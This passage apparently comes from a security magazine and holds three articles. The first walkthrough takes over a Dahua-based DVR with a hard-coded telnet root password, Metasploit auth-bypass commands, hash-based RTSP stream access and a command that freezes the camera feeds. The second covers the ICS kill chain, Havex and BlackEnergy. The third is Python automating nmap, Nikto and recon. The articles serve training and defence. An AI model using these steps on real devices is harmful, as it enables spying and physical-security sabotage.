almost endless connected IoT devices, in seconds. Online security systems, video cameras, building control devices, and
monitoring devices can be located almost instantly by entering the right search phrases. This is usually just the
manufacturer’s name or the server software that they are running. In most circumstances, you can see what software a
target is running, what ports are open, and their geographical location. Shodan sometimes even lists CVEs for known
vulnerabilities.
The free Shodan account is pretty limited. If you have a registered Shodan account (great membership sales usually around
the major US holidays!) you can use the full set of search filters and can access a lot more returns. For example, using the
search filter, “has_screenshot:true” returns almost a million and a half online devices of which Shodan was able to
take a screenshot. This includes industrial, building, security, and monitoring devices. It also includes VNC and remote
access sessions and lots of cameras!
Hackers use Shodan frequently, but security teams and companies also heavily use Shodan. For example, a company can
quickly see what devices they have publicly exposed with a few filter-keyword searches. Shodan’s professional monitoring
services are also a huge asset for protecting companies.
HACKING WITH IOT
IoT devices aren’t just targets; with the rise of powerful “Single Board Computers”, they are increasingly being used as
offensive security devices. The offensive security world is in love with them. To borrow a term from the military, we see IoT
47
devices as “Dual Use Tech” - meant for one thing, but can be repurposed and “weaponized”. The Raspberry Pi (RPi) is very
popular in the security community. With very little effort it can run a full install of the popular pentesting platform Kali
Linux. They are also actively being used as DropBox and stealthy “sniffer” devices - hacker implant devices that are left
behind on a target site, either collecting information or allowing an attacker remote access to the internal network -
sometimes both! Lastly, they are used as physical security attack devices. Software like P4wnP1 turns an unassuming Pi0W
into an air gapped USB attack device.
In this article, we are going to see how easy it is to exploit and take over a vulnerable DVR security camera system using a
Raspberry Pi 4/ 400. I will be using a professional building/office DVR that controls four wired Power Over Ethernet (POE)
cameras. In preparing this article, I used both Kali Linux and Raspberry Pi OS (RasPi OS) on the RPi. The tools used work
equally well on both, though it is much easier to remotely view camera feeds with RasPi OS.
So, let’s get started!
Preparing The Raspberry Pi
You can run a full install of Kali Linux on the RPi. It is very easy to install and for the most part is 100% identical to the
desktop version - though some tools don’t run on ARM. Whether you chose Kali or RasPi OS, the install is identical.
Download the operating system of your choice from the developer’s website, write it to a MicroSD card, insert it into the Pi,
attach peripherals and lastly, power up. The system will boot up into a graphical desktop of the OS you chose! It is literally
that easy.
We only need Nmap, Telnet and the Metasploit Framework on the RPi. These come pre-installed on Kali, so you are all set.
Both tools need to be installed if you chose RasPi OS.
Nmap Install: sudo apt install nmap
Telnet Install: sudo apt install telnet
Metasploit Install:
curl
https://raw.githubusercontent.com/rapid7/etasploit-omnibus/master/config/templates/e
tasploit-framework-wrappers/msfupdate.erb > msfinstall && chmod 755 msfinstall &&
./msfinstall
That’s it, we are now good to go! The directions for either Kali Linux or RasPi OS are identical from here on out.
48
PORT SCAN AND IDENTIFY TARGET
As with any regular engagement, the first step is to recon your target. It is no different when dealing with IoT devices. A
quick Nmap scan will tell us everything we need to know.
Open a Terminal and enter, “nmap [target_IP] -A”
Now, one thing that is very interesting here is the HTTP and RTSP server services that are running. Notice it is running
Dahua services. This security system is NOT a Dahua brand, it is from a completely different manufacturer, but it is
running Dahua services. If we Google for “Dahua exploit”, you will get almost 260,000 search returns, multiple CVEs and
several interesting articles.
Including this Forbes Article1:
“Millions of Chinese-made cameras can be hacked to spy on users” - well, that doesn’t sound good. If we read through some
of the other articles, it gets even more concerning. Apparently, several Dahua systems had telnet passwords hard coded into
the firmware. According to the Dahua Wiki2, the telnet root password could be “vizxv” (yikes) or no password (double
yikes). But no worries, the Dahua Wiki tells you how to reset this back to “admin”.
A simple five lowercase letter password for the unit’s built in root account? It can’t be that easy - let’s try it!
49
And we are in! I now have remote Root access to the security system. Thank you for tuning in, I hope you enjoyed this
article! Okay, just kidding, there is more! At the end of the article, I will show you something very interesting that you can
do while logged in as root. For now, I just want to view the security camera feeds from the unit.
A little analysis of the unit and I found that the POE cameras attached were a subnetwork of the DVR system. So basically,
the DVR acted like a DHCP and streaming server to the wired cameras. It then took the camera streams and streamed them
to the host client software that would run on remote computers. What was interesting though, is the client viewer software
had a different username/ password combination to view the cameras. You can’t view the camera feeds using the root
password.
The DVR itself only has a single user account, “root”:
So, how do we access the camera feeds?
METASPLOIT’S DAHUA EXPLOIT MODULE
Metasploit to the Rescue - the Metasploit Framework has a module specifically for Dahua security systems. Let’s check it
out!
Start Metasploit, “msfconsole”
Enter, “search dahua”
50
Type, “info 0” to pull up the info page for the Dahua DVR module.
This looks like it could be very useful:
Let’s try this module out!
Enter, “use 0”
Or, you could type in the long version “use auxiliary/scanner/misc/dahua_dvr_auth_bypass”, but since
we already searched for it, you can use it by using the search return ID number.
Next, enter, “set RHOSTS [Target_IP_Address]”
Lastly, enter “user”
The Metasploit module runs with the “user” option and pulls the user information from the DVR.
51
We now have three video client users and their password hash! Now, you could try to crack the passwords with John the
Ripper, but there is no need. If you read through the CVEs for Dahua, you will find that on some models, entering the
password hash is the same as entering the password!
GRABBING THE VIDEO STREAM
We now have everything we need to watch the video feed remotely. The Dahua Wiki3 describes how to connect to the
cameras using the rtsp protocol. We just need a client that can view the video. The RasPi OS already has VLC Media Player
loaded, we can use that.
Start the VLC Media Player
Click “Media” on the main menu
Click “open Network stream”
Enter:
rtsp://admin:csSWCxV1@172.24.1.165:554/cam/realmonitor?channel=1&subtype=0
Here we are using the username and password hash. Channel 1 is the DVR, and subtype is the camera number, if you
increment the camera number, you can see the additional cameras (four on this system).
In VLC Viewer, hit “Play”
52
We have a live remote security camera feed without ever logging into the device. Better yet, it is running on a Raspberry Pi!
SPY TIME - MAKING THE CAMERA DISPLAY AN OLD IMAGE
Everyone has seen the espionage movies where the ninja spy hacks into the security camera system and makes it display an
old image, so the spy can sneak into the protected area undetected. You can do that with this model camera too! Remember
when I said that the DVR acts as a DHCP server for all the connected cameras? What happens to the camera feed if I log
into the DVR as the Root user and down the network interface for the cameras?
The crazy thing is that it is silly easy to do with this model system.
After logging into the DVR as Root, enter, “Ifconfig eth0:poe down”
That is literally it. The images on the local DVR display and VLC viewer on the RPi stays up for about 5 seconds and then
disappears. But the last image recorded seemed to remain on the manufacturer’s Viewer Client software indefinitely!
53
So, if you were watching the Manufacturer’s client software, a bad guy could theoretically shut down the cameras, sneak
into the camera view above, take the book and run, and no one would ever see it, lol!
The camera network interface and feeds can be brought back up with “netinit” command.
DEFENSE
This is all very concerning, especially that it can all be done using a $35 Raspberry Pi system. How can it be defended
against? Simple, update the firmware on all your internet connected devices! Dahua has provided fixes and updates for all
the vulnerabilities mentioned in this article. Also, the individual maker of the DVR covered in this article has gone out of
business, permanently disabling the client software that had the “spy display” image issue.
I can’t begin to stress how important keeping your online devices updated and using long complex passwords. It is
extremely easy to find vulnerable systems online in seconds. Hackers are actively scanning and looking for them. So, it is
best to make a policy to regularly check for updates for all your internet connected devices. Be safe out there!
54
If you want to learn a lot more about using Raspberry Pi for Offensive Security, check out my book, “Security Testing with
Raspberry Pi”, available on Amazon.com.
Resources and References
1. Zak Doffman, Aug 3, 2019, “Warning As Millions Of Chinese-Made Cameras Can Be

Hacked To Spy On Users: Report”
https://www.forbes.com/sites/zakdoffman/2019/08/03/update-now-warning-as-eavesdropping-ri
sk-hits-millions-of-chinese-made-cameras/
2. Dahua Wiki - https://dahuawiki.com/images/2/28/IPC_Telnet_clear_old_config_file.pdf
3. Dahua Wiki - https://dahuawiki.com/Remote_Access/RTSP_via_VLC
55
RED TEAMING
VIA ICS AND
SCADA
ADVERSARY
TACTICS
ALEXANDROS PAPPAS
Alexandros Pappas BSc works as Security Incident Response at
Epiq. Working for several big companies, he is responsible for
conducting Tactical Threat Intelligence with integrated
solutions, and Incident Response. At the same time, the author
extends his knowledge in Purple Team Tactics, Penetration
Testing and Red Teaming. Additionally he is Contributor for the
GHDB with 300 dorks published. Highly motivated and
passionate about security, he can be reached via an
email at pappasvar@gmail.com
57
Red Teaming via ICS and SCADA Adversary Tactics
INTRODUCTION
Industrial Control Systems (ICSs) are embedded cyber-devices that operate critical infrastructures (e.g., energy,
transportation, water, oil, etc). ICS devices are lesser known and are typically unique to the Operational Technology (OT)
framework of cyber, which differs from enterprise Information Technology (IT). Cyber-threats in ICSs manifest themselves
in different ways. Cyber attacks on industrial control systems (ICSs) differ in impact based on a number of factors,
including the adversary’s intent, their sophistication and capabilities, and their familiarization with ICS and automated
processes. Generally speaking, cyber attackers target these ICS environments via a campaign of attempts that allows access
and provides enough information to invent an effect. However, the most important point when it comes to ICSs, is that the
knowledge of the adversary’s operations can help defenders appreciate the attacker’s possible intent, level of sophistication,
capabilities and familiarization with the ICS, which together work to unveil the potential impact of the attack on an
organization.
DEFINITIONS AND TERMINOLOGY
PowerShell: is a task automation and configuration management framework from Microsoft, consisting of a
command-line shell and the associated scripting language. Initially a Windows component only, known as Windows
PowerShell, it was made open-source and cross-platform on 18 August 2016 with the introduction of PowerShell Core. The
former is built on the .NET Framework, the latter on .NET Core.
ICS: In manufacturing, industrial control system (ICS) is a general term used to describe the integration of hardware and
software with network connectivity in order to support critical infrastructure.
SCADA: Supervisory control and data acquisition (SCADA) is a control system architecture that uses computers,
networked data communications and graphical user interfaces for high-level process supervisory management. The
operator interfaces that enable monitoring and the issuing of process commands, such as controller setpoint changes, are
handled through the SCADA supervisory computer system. However, the real-time control logic or controller calculations
are performed by networked modules that connect to other peripheral devices, such as programmable logic controllers and
discrete PID controllers, which interface to the process plant or machinery.
CYBER KILL CHAIN
The cyber kill chain is a series of steps that trace stages of a cyberattack from the early reconnaissance stages to the
exfiltration of data. The kill chain helps us understand and combat ransomware, security breaches, and advanced persistent
attacks (APTs). Lockheed Martin derived the kill chain framework from a military model – originally established to
identify, prepare to attack, engage, and destroy the target. Since its inception, the kill chain has evolved to better anticipate
and recognize insider threats, social engineering, advanced ransomware and innovative attacks.
58
Figure 1. Cyber Kill Chain model by Lockheed Martin.
ICS CYBER KILL CHAIN
The idea of the ICS Cyber Kill Chain provides a structure and visibility in a high level of what is going on with regards to
different attacks and how the good guys can defend against those with what kind of counter attacks in place. Due to the
specific characteristics of features deployed on control systems and the exclusive configurations presented by them,
carrying out a successful attack requires considerable knowledge.
ICS CYBER KILL CHAIN STAGE 1 BREAK DOWN
Planning Phase
The first step of Stage 1 is the planning phase where the objective is to reveal weaknesses and identify information that
support attackers in their efforts to target, deliver and exploit elements of a system. This can be done via reconnaissance
where attackers conduct research about the target using OSINT (Open-source intelligence) tools and searches of publicly
available data. By doing this, they are able to map a target’s publicly or privately accessible attack surfaces, patterning
activity and determining versions of operating system software through routine queries.
Preparation Phase
The second phase of Stage 1 is the preparation that includes both weaponization or targeting. Weaponization and targeting
can both take place, but both are not required. Weaponization includes modifying an otherwise harmless file, such as a
document, for the purpose of enabling the adversary’s next step. Targeting can also take place in the second phase and
occurs when the adversary or its agent (such as a script or tool) identify potential victim(s) for exploitation. For example, if
there is an authenticated VPN (Virtual Private Network) directly connected to a SCADA environment, which is using
Windows 10 with PowerShell, then an attacker doesn’t necessarily need to weaponize the VPN and install any malware to
59
break in. Rather, just logging in and using the PowerShell environment or trying different modifications via the PowerShell
environment can allow an attacker to get in.
Cyber Intrusion Phase
In this phase, gaining initial access is about to happen. An intrusion is any kind of attempt by the adversary, successful or
not, to gain access to the defender’s network, system, or environment. This includes the Delivery step, in which the
adversary uses a method to interact with the defender’s network, followed by the Exploit step, where the adversary uses it to
perform malicious actions.
Management and Enablement Phase
In this phase, attackers are able to establish command and control (C2), using methods such as a connection to the
previously installed capability or abusing trusted communications such as the VPN.
Sustainment, Entrenchment, Development, and Execution phase
Last but not least regarding Stage 1, in this last phase attackers can act in various ways depending on their goal(s). This may
include the discovery of new systems or data, lateral movement around the network or environment, installation and
execution of additional capabilities, launching of those capabilities, capturing transmitted communications such as user
credentials, and the list goes on...
At this point, it must be underlined that Stage 1, most directly maps to what would constitute a breach in traditional IT
networks. It is important to highlight that this stage can be bypassed if defenders have Internet Facing ICS components or
information about the ICS and process from a successfully compromised third-party. Recent Black Energy2/3 campaigns
attempt to exploit susceptible Internet-facing devices. Understanding where an adversary is in his or her campaign can
enable defenders to make better-informed security and risk management decisions. By understanding the inherent
advantages of well-architected ICS networks and by understanding adversary attack campaigns against ICS, security
personnel can see how defense is doable.
With regards to Red Teaming ICS environments, the most challenging thing is that all these environments are very
different between them with regards to variety, network components, architecture, technology, protocols, etc. In general,
there is no commonality between all ICS sites. For example, if an attacker wants to attack a substation of an electrical power
grid in a specific area in a country, then they might have to use a different approach to attack the other substation of an
electrical power grid in a different area in the same country! Different vendors, different configurations, and different ways
of being integrated, make things very challenging, and new approaches come into play to address this interesting field. In
fact, Stage 1 refers to the point that the attacker understands very well the ICS environment to impact them. In reality, it is
more engineering than cyber stuff.
60
Figure 2. Cyber Intrusion Preparation and Execution - Stage 1. Stage 1 mimics a targeted and structured attack campaign.
ICS CYBER KILL CHAIN STAGE 2
So when it comes to creating any damage (physical or logical), or disruptions, or for example, making the water go down, or
oil to stop, etc., then we are referring to ICS Cyber Kill Chain Stage 2. In Stage 2, attackers need to develop some sort of
understanding to do the attack, or mostly develop a specific capability for the ICS. However, at some point you have to test
it. Since these environments are so different, it is required to test our knowledge and capabilities especially for those large
scale attacks and for the things we are more concerned about. Now regarding the ICS Attack phase of Stage 2, which
includes the Delivery, Install/Modify and Execute ICS Attack, this means that the attacker must know more and more about
the whole ICS environment, which makes those environments the most defensible on earth.
Attack Development and Tuning
The first phase of Stage 2 is the Attack Development and Tuning where the attacker develops a new capability tailored to
affect a specific ICS implementation and for the desired impact.
61
Validation
In this phase, the attackers must test their capabilities on similar or identically configured systems if the capability is to
have any meaningful and reliable impact. Additionally, for more significant impacts, significant testing may occur in which
the adversary may acquire physical ICS equipment and software components.
ICS Attack
The last phase of Stage 2 is the ICS Attack, where the adversary will deliver the capability, install it or modify existing
system functionality, and then execute the attack. The attack may have many facets (preparatory or concurrent attacks) that
fall into the attack categories of enabling, initiating or supporting to achieve their ultimate effect.
Figure 3. ICS Attack Development and Execution - Stage 2. Stage 2 shows the steps associated with a material attack that requires high
confidence.
ADVERSARY TACTICS - USE CASES
Havex
Havex was not using any 0day exploits and stuff like that. The Havex malware had two primary components: A RAT and a
C2 server written in PHP. Havex also included an OPC (Open Platform Communications) scanning module used to search
for industrial devices on a network. The OPC scanning module was designed to scan for TCP devices operating on ports
44818, 105 and 502, where these ports are common to ICS/SCADA companies such as Siemens and Rockwell Automation.
By abusing the OPC protocol, Havex mapped industrial networks once inside victim systems. The OPC scanning module
62
only operated on the older DCOM-based (Distributed Component Object Model) OPC standard and not the more recent
OPC Unified Architecture (UA). Havex joins the category of ICS tailored malware because it is written to conduct
information gathering on these specific systems. Havex also exploited supply chain and watering-hole attacks on ICS
vendor websites in addition to spear phishing campaigns to gain access to victim systems. The watering-hole and supply
chain attacks were twofold in methodology. In the first method, victims were redirected from legitimate vendor websites to
corrupted pages containing the Havex malware. In the second method, the attackers compromised vulnerable vendor
websites and corrupted legitimate software to inject the Havex RAT. Users would then unknowingly download the malware
when downloading otherwise legitimate software from vendor websites. This method allowed the malware to bypass
traditional security measures because software was downloaded by users with authorization to install programs onto the
network. Known compromised vendors were MESA Imaging, eWON/Talk2M, and MB Connect Line. While the attack
vectors were aimed at business networks, the lack of robust air gaps in many ICS environments could allow malware like
Havex to jump easily from business networks to industrial networks and infect ICS/SCADA equipment. Havex, like other
backdoor malwares, also allows for the injection of other malicious code onto victim devices. Specifically, Havex was often
used to inject the Karagany payload onto compromised devices. Karagany could steal credentials, take screenshots, and
transfer files to and from Dragonfly C2 servers.
Figure 4. HAVEX ICS Cyber Kill Chain.
63
Figure 5. Pre-Havex and Post-Havex scanned ports, where these ports are common to ICS/SCADA companies such as Siemens and Rockwell
Automation.
BlackEnergy 2 and 3
BlackEnergy Malware, on the other hand, was first reported in 2007 as an HTTP-based toolkit that generated bots to
execute distributed denial of service attacks. In 2010, BlackEnergy 2 emerged with capabilities beyond DDoS (Distributed
Denial-of-Service). In 2014, BlackEnergy 3 came equipped with a variety of plug-ins. A Russian-based group known as
Sandworm (aka Voodoo Bear) is attributed with using BlackEnergy targeted attacks. The attack is distributed via a Word
document or PowerPoint attachment in an email, luring victims into clicking the seemingly legitimate file.
BlackEnergy 2 used sophisticated rootkit/process-injection techniques, robust encryption, and a modular architecture
known as a "dropper". This decrypts and decompresses the rootkit driver binary and installs it on the victim machine as a
server with a randomly generated name. As an update on BlackEnergy 1, it combines older rootkit source code with new
functions for unpacking and injecting modules into user processes. Packed content is compressed using the LZ77 algorithm
and encrypted using a modified version of the RC4 cipher. A hard-coded 128-bit key decrypts embedded content. For
decrypting network traffic, the cipher uses the bot's unique identification string as the key. A second variation of the
encryption/compression scheme adds an initialization vector to the modified RC4 cipher for additional protection in the
dropper and rootkit unpacking stub, but is not used in the inner rootkit nor in the userspace modules. The primary
modification in the RC4 implementation in BlackEnergy 2 lies in the key-scheduling algorithm. The latest full version of
BlackEnergy emerged in 2014. The changes simplified the malware code: this version installer drops the main dynamically
linked library (DLL) component directly to the local application data folder.] This variant of the malware was involved in
the December 2015 Ukraine power grid cyberattack.
64
Figure 6. BlackEnergy 2 & 3 ICS Cyber Kill Chain.
RECOMMENDATIONS FOR BETTER ICS RED TEAMING
The best and most important point when it comes to Red Teaming ICS environments, is safety and reliability. These two
key points are paramount, which requires coordination. This simply means that the people who are going to take actions,
need to communicate very well between them. This has to deal with both Red and Blue Teams during a Red Team ICS
engagement, where the Red Team has to test the Blue Team and their detection and response capabilities. For example,
from the Red Team’s point of view, the key points that deserve a lot of attention would be whether the Blue Team can see,
for how long, what they can see, and how can they respond effectively to an ICS Red Teaming engagement. As far as the
Blue Team is concerned, the valuable information for them would be if they could detect all those actions mapped in Stage 1
of the ICS Cyber Kill Chain, as mentioned above. Then, based on this information, they could extend their knowledge and
build more confidence in detection capabilities.
So, in fact, Stage 1 is often very similar to IT hacking with the intent of ICS details, where Stage 2 is often learning the ICS
and using it against itself. Another good recommendation that has great value is that a Red Teaming engagement in the ICS
is useful starting as a tabletop exercise. Last but not least, it is very important to find a lab network, if possible, or during
maintenance periods, and test the defenders as much as you test the architecture and passive defenses. Additionally, as
always in such kinds of situations, offense informs defense.
To sum up, the above-mentioned ICS Cyber Kill Chain is a model that builds upon the traditional understanding of a Cyber
Kill Chain and tailors it to adversary attacks on ICS. The model provides defenders an opportunity to better understand the
phases of an adversary’s campaign into an ICS to identify opportunities for detection, remediation and defense. These
opportunities for success also highlight that ICS networks are more defensible than traditional IT networks and stress the
importance of maintaining this defensible architecture through actions such as limiting the integration of safety systems
with operations networks and removing ICS components from direct Internet access.
65
REFERENCES:
1. https://whatis.techtarget.com/definition/industrial-control-system-ICS
2. https://en.wikipedia.org/wiki/Industrial_control_system
3. https://www.trendmicro.com/vinfo/us/threat-encyclopedia/web-attack/139/havex-targets-i
ndustrial-control-systems
4. https://en.wikipedia.org/wiki/Havex
5. https://scadahacker.com/resources/havex.html
6. https://en.wikipedia.org/wiki/BlackEnergy
7. https://www.infosecurity-magazine.com/opinions/blackenergy-malware-infrastructure/
8. https://www.incibe-cert.es/en/blog/cyber-kill-chain-applied-ics
9. https://www.varonis.com/blog/cyber-kill-chain/
10. https://www.sans.org/reading-room/whitepapers/ICS/
66
AUTOMATING
THE MITRE
ATT&CK WITH
PYTHON
BRUNO RODRIGUES
Creating a better world through technology is now a life time
mission of the author. He hopes you can join him in creating a
safer e-one.
68
Automating the Mitre Att&ck with Python
INTRODUCTION
I’m a firm believer that we cannot continue doing cyber security as we do it today - not enough time, not enough resources.
It’s a lost war. Attacks are getting more sophisticated, bad hackers are becoming more advanced, techniques more
elaborate. Security or cyber security, if your concern is with the attacks, it will require a lot more automation than currently
implemented.
In this article, I’ll focus on the Mitre Att&ck. Why? Because it’s a trend subject and because it’s the perfect example of what
I said. If you look at the picture below, you’ll see that this framework allows to explore multiple threats, technologies, and
attacks, making it a daunting task to keep organizations protected.
Our goal today is to get you, the reader, on the right track to automate the attack as a form of defense. Look at this simple
scenario – you and your team oversee implementing security as a way to protect against the Mitre Att&ck framework. You
start by deciding on which vendors to implement and there are a lot. This article will not focus on what you choose to
protect yourself.
Nevertheless, during a PoC phase, or after you implement the chosen solutions, you decide to test its efficiency. You do it
because you want to understand what weaknesses remain, because you have a red team or just because you’re evaluating
multiple solutions at once. Looking at the above picture, you quickly realize you are understaffed and do not have enough
time to properly test.
The only option would be, in a certain way, to automate the multiple attacks that you need to constantly run against your
perimeter. You probably know how fast and easy the perimeter changes, mutates, or becomes vulnerable. This is the
69
journey path I’m taking you on, using our good friend Python and programming a couple of real attacks. This will be your
starting point.
CONCEPTS
Before we proceed, we need to discuss a couple of concepts. Every good piece of software is a piece of art. As any piece of
art, it needs a structure. This structure will guide us through developing choices and make us consistent on what we
produce, making sure our goals are reached.
Use the proper tools!
Let me put this plain and simple – don’t reinvent the wheel. There are a lot of tools out there that will allow us to be
successful in our Mitre journey. We don’t need to code the tools we need from scratch. We just need to run them properly
and in a consistent way.
In this article, I’ll be using Kali Linux as my base OS. Meaning, what I’ll develop will run in an OS that is Kali Linux,
allowing us to take advantage of the vast arsenal available to hack. Although it’s not the goal of this article to explain how to
deploy Kali Linux, in a production environment, you’ll need to decide where you want to run it – on your laptop, in the
cloud, etc. I found myself with some problems in running Kali on a Windows server 2019 WSL 2. My goal was to have
something in the cloud that would allow me to run it continuously. Nevertheless, there’s something wrong with the
deployment and I was unable to. You can check it out here - Install the Linux Subsystem on Windows Server | Microsoft
Docs.
In our example, we are going to stay with tools from the first part of the Framework – Reconnaissance, but I’ll let the reader
take it from here and use your skills and imagination to move to every category and every technique. The larger your testing
goes, the safer your network will be.
Interaction with tools
As a concept, we only use tools that allow one of two things – cli commands and/or has an API. This way we can decide if
we are using the API or just send the command to bash to run it. It’s as simple as that, so no matter what tool you decide to
use, unless you’re coding it from scratch, one of these two conditions needs to be met. If not, the tool will need to be out.
Reuse of information
This is a very important part of the concept. We don’t want to keep piling up information and not properly use it. The goal
here, as the Mitre Attack framework is complex, is to use the information collected from one tool to be the base information
on what the other tools will run.
70
You can do this for tools inside the same category or move the information to tools in different categories. Nevertheless,
don’t get different tools to get the same information. It’s a waste of time and computing resources and, as the solution
grows, you’ll need all the time and resources you can get.
For this article, we’ll keep it simple – we use files to store and process our collected information. This way we can always
audit what we collected, insert values manually from our manual research or check if errors occurred. Another option
would be to use databases.
Another thing we’ll do is gather all the information (optional and you might choose to go with a different solution) in a
centralized repository of findings. I’m a big fan of Faraday open source. So, we only use tools that are supported
out-of-the-box by Faraday. You can learn more about this project and the 70+ tools it supports here -
https://github.com/infobyte/faraday
There were some time restrictions when writing this article and for this reason we won’t be incorporating our tools with the
API section of Faraday. This would be ideal as we could then use it also to extract specific information from the host using
the API. As you‘ll see, we’ll be using (not tested during my setup) the upload option of the report. You can learn more here -
https://github.com/infobyte/faraday/wiki/Plugin-List#report
Also, you might need to tweak the file names to be accepted. As mentioned before, I didn’t go through this part as much as I
would like to. For instance, in the recon-ng tool, you probably should not use json format for the output but instead xml.
For this reason, we are also going to add some code to the “if” part since we’ll need to look into files.
Two things to retain:
• Using files instead of Faraday will give you more flexibility on your Mitre Att&ck framework deployment.
• Using Faraday API will make the coding much easier to get the specific information you require about the hosts to
make decisions.
71
Remember that Faraday server does not run in standard ports, so to access the server, for instance, you’ll need to connect to TCP 5985. This can
be changed on the config file mentioned on Github. Also, please make sure you change the config file “BIND” from localhost to 0.0.0.0 so you can
connect from the internet.
Remember that this deployment is not secure (no certificates or WAF) so if you’re thinking of putting it in production, make sure you use the paid
version (for support and more functionality) and you properly deploy it.
RECONNAISSANCE MODULES
Gather Victim Network Information
Recon-ng
Before compromising a victim, adversaries may gather information about the victim's networks that can be used during
targeting. Information about networks may include a variety of details, including administrative data (ex: IP ranges,
domain names, etc.) as well as specifics regarding its topology and operations.
Adversaries may gather this information in various ways, such as direct collection actions via active scanning or phishing
for information. Information about networks may also be exposed to adversaries via online or other accessible data sets (ex:
Search Open Technical Databases).[1][2][3] Gathering this information may reveal opportunities for other forms of
reconnaissance (ex: Active Scanning or Search Open Websites/Domains), establishing operational resources (ex: Acquire
Infrastructure or Compromise Infrastructure), and/or initial access (ex: Trusted Relationship). [source:
https://attack.mitre.org/techniques/T1590/].
Going back to our structure (the most important part of coding besides algorithms), we’ll need to:
• Provide a domain.
• Start a discover.
• Collect the data to a file.
• Upload the report to Faraday.
There are multiple tools out there that you can use to start your passive scanning and recon. In our case, we’ll go with
recon-ng as this allows us to run a CLI version and integrates with Faraday. It’s out of the scope of this article to dig into the
multiple usage recon allows us as it’s a very powerful tool. I do encourage the reader to explore all the capabilities and
perfect the command we are using.
That said, we’ll be running the following command:
recon-cli -m recon/domains-hosts/hackertarget -o SOURCE=hackin9.org -x >> recon-ng.txt
Explanation:
72
• We are using the module hackertarget that I’ve installed via recon-ng.
• We are starting to discover hackin9.org.
• We are saving the results to recon-ng.txt.
From a coding point of view, what we want to achieve is:
• Run a CLI command on Kali that will take one input – the Domain.
• Insert the user given domain in the cli command.
• Create a report.
• Import the report to Faraday server.
Code
Let me explain you how simple the code is:
import os
class recon_ng:
def __init__(self, domain):
self.domain = domain
def recon_ng(self):
os.system(f"recon-cli -m recon/domains-hosts/hackertarget -o SOURCE={self.domain} -

x")
os.system(f"recon-cli -w hackin9.org -m reporting/json -o FILENAME=/home/bmrodrigue

s/MitreAtt/recon-{self.domain}.json -x")
print('Please insert password to upload report to Faraday server: \n ')
os.system(f'scp recon-{self.domain}.json zeususer@52.168.1.180:~/')
We start by importing the Python library OS. We then proceed to create a class for the recon-ng program, so we can create
objects that take the input “Domain” and output a result file and report. The special __init__ function always asks for a
domain and this will be the only time we are going to request an input from the user. After that, everything that will be used
73
is available information. It’s that simple. We won’t be needing the __init__ function anymore. This means, every time we
call the recon_ng class, we’ll need to provide it with a domain name.
This domain name is then passed to the function that will run recon_ng and upload the result to Faraday. The os.system
command are the commands we want to run on shell, making it easier for you to customize them.
The commands we are using are:
1. From recon-cli
a. We set up our special __init__ function to get the domain name.
b. We create a workspace with -w to store our results.
c. We use the hackertarget module.
i. Source will be populated once we provide the domain.
d. We then run a second command to export the workspace results to json format, so we can import it into
Faraday.
2. For Faraday
a. We just upload the report to it and it should do the trick, according to this: “Plugins that import file reports.
You have to copy the report to ~/.faraday/report/{workspacename} (replacing {workspacename} with the
actual name of your Workspace) and Faraday GTK client will automatically detect, process and add it to the
HostTree. If Faraday is not capable to detect the plugin needed to process the report, you can manually choose
which plugin will be used by adding _faraday_pluginName to the file name before the extension.”
Nmap
Now that we have started our passive scanning, we want to move in the framework and get some active scanning. We’ll be
using nmap to achieve our goal. This will allow us to get a clear view of IPs, ports opened, services running, OS versions and
some vulnerabilities. I say vulnerabilities, because I’m not going to be nice with this scan and we’ll run it in Aggressive
mode:
Nmap -A {host} -oX {host}.xml
We’ll be running this command for all IPs found from Recon-ng. So at the end of the day, you’ll have multiple files, one per
host, added to your Faraday.
So, what are we running:
• -A we are running Nmap in aggressive mode.
74
• We are going to loop through the IPs on the json file from Recon-ng.
• And we are saving our output to an XML file where we take the IP to make it unique. (Again, you might need to
tweak this file name so Faraday can pick it up. Didn’t test it.)
So, this is how the code looks:
import os
import json
class nmap:
def __init__(self, domain):
self.domain = domain
def nmap_scan(self):
file = open(f"recon-{self.domain}.json", 'r')
jsonfile = json.load(file)
for index, item in enumerate(jsonfile['hosts']):
ip = item['ip_address']
os.system(f'nmap -A {ip} -oX {ip}.xml')
os.system(f'scp {ip}.xml zeususer@52.168.1.180:~/')
Code details:
• We start by importing 2 libraries – os and json
• We create our own nmap class
75
• Get the __init__ function so we can pass the domain name
• Create a function to run our nmap and upload it to Faraday
The IF part
This is where the fun begins. Till now, we are required to run both applications up top. The reason is we need that
information. But now that we have the Nmap scan, we need to make decisions on what to use based on our findings. Just as
a Hacker would do. FUN!
Disclaimer – there is a part of the code that I had no time to put in but maybe you, the reader, can ping me on LinkedIn and
suggest a way to sort the problem. What part of the code? Where we check ALL the Nmap created files and not the static
one configured on the code below:
import os
from xml.dom import minidom
from nikto import nikto
class if_ports:
def check_ports():
nikto_file = minidom.parse("nmap_104.200.23.95.xml")
ports = nikto_file.getElementsByTagName('port')
for port in ports:
if port.getAttribute('portid') == '80':
ip = nikto_file.getElementsByTagName('address')
ip_address = (ip[1].attributes['addr'].value)
nikto_scan_ip = nikto(ip_address)
nikto_scan_ip.nikto_scan()
76
elif port.getAttribute('portid') == '22':
print('do other stuff, like ssh Brute Force (use Hydra :-)')
else:
print('ENDED !')
So what have we done here? We also created a class but this time we don’t require the __init__ method. Why? Because we
don’t need inputs, we’ll just take what we need from the information we already have – in this case form Nmap scans (now
that I think about it, the input could be the Nmap scan file… maybe… I’ll let you decide).
The important part goes to for port in ports and then to the if statements, making this Mitre Att&ck app more flexible. You
can add more tests and tools as you go, each with a simple elif statement.
So we are looping through the file records, after parsing it to xml, and then we look for port 80 (web) and if so, we run the
next program we wrote – Nikto class.
If we find port 22, I suggest we run Hydra (another class but, as an example, it will just print the info). And we give the IP
from that host to the next class as input – the IP. How cool is that?
Nikto
Now the real fun begins. We are moving away from the “we need to run this” to the “if” phase. Why do I say “if” phase?
Nikto is an Open Source (GPL) web server scanner that performs comprehensive tests against web servers for multiple
items, including over 6700 potentially dangerous files/programs, checks for outdated versions of over 1250 servers, and
version specific problems on over 270 servers. It also checks for server configuration items such as the presence of multiple
index files, HTTP server options, and will attempt to identify installed web servers and software. [source:
https://cirt.net/Nikto2]
That means that we are only going to run Nikto against hosts or IPs that we know are web servers. How do we accomplish
that? We’ll need to check the files created by Nmap and make an if decision. You’ll see that on the main program – if we
have ports 80 or 443 open (it could be more complex since we can have web services running on non-standard ports, but
we’ll keep it simple for the article) then we create a new file and run through that file using Nikto.
Two reasons why we don’t run through the IP file even if the IP has no web server:
1. When you code, you want it to be as clean as possible and avoid unnecessary coding. This makes the program
